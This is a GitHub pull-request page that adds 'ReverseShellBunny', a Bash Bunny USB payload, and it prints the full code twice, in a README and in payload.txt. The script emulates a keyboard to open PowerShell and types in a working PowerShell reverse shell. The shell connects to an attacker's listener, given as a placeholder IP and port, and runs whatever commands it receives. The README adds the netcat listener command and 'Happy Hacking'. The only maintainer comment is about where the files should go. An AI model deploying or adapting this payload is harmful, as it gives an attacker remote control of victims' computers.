Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

ReverseShellBunny #684

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
25 changes: 25 additions & 0 deletions READEME.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
A simple reverse shell for the Bash Bunny. I use it to connect to a Lightsail server. Just enter the IP and Port of the listener. Listener command nc -lnvp then port number. Put payload in switch folder.
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You have placed your files in the wrong directory. make sure to place it in bashbunny-payloads/tree/master/payloads/library/CATAGORY/PAYLOADNAME


Heres the code. Happy Hacking.

#TITLE. ReverseShellBunny #AUTHOR.DarkStorme #Reverse Shell for the Bash Bunny

#!/bin/bash

Set attack mode to HID
ATTACKMODE HID

LED attack indication
LED ATTACK

Open PowerShell
QUACK GUI r QUACK DELAY 500 QUACK STRING powershell.exe QUACK DELAY 500 QUACK ENTER QUACK DELAY 2000

Define the PowerShell payload
PS_PAYLOAD='$client = New-Object System.Net.Sockets.TCPClient("IP ADDRESS",PORT);$stream = $client.GetStream();$bytes = New-Object byte[] 65536;while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {$data = [System.Text.Encoding]::ASCII.GetString($bytes, 0, $i);$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String);$sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback);$stream.Write($sendbyte, 0, $sendbyte.Length);$stream.Flush()};$client.Close()'

Send the PowerShell payload
QUACK STRING "$PS_PAYLOAD" QUACK ENTER QUACK DELAY 5000 QUACK GUI d

LED finish indication
LED FINISH
31 changes: 31 additions & 0 deletions payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
#TITLE. ReverseShellBunny
#AUTHOR.DarkStorme
#Reverse Shell for the Bash Bunny

#!/bin/bash

# Set attack mode to HID
ATTACKMODE HID

# LED attack indication
LED ATTACK

# Open PowerShell
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell.exe
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 2000

# Define the PowerShell payload
PS_PAYLOAD='$client = New-Object System.Net.Sockets.TCPClient("IP ADDRESS",PORT);$stream = $client.GetStream();$bytes = New-Object byte[] 65536;while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {$data = [System.Text.Encoding]::ASCII.GetString($bytes, 0, $i);$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String);$sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback);$stream.Write($sendbyte, 0, $sendbyte.Length);$stream.Flush()};$client.Close()'

# Send the PowerShell payload
QUACK STRING "$PS_PAYLOAD"
QUACK ENTER
QUACK DELAY 5000
QUACK GUI d

# LED finish indication
LED FINISH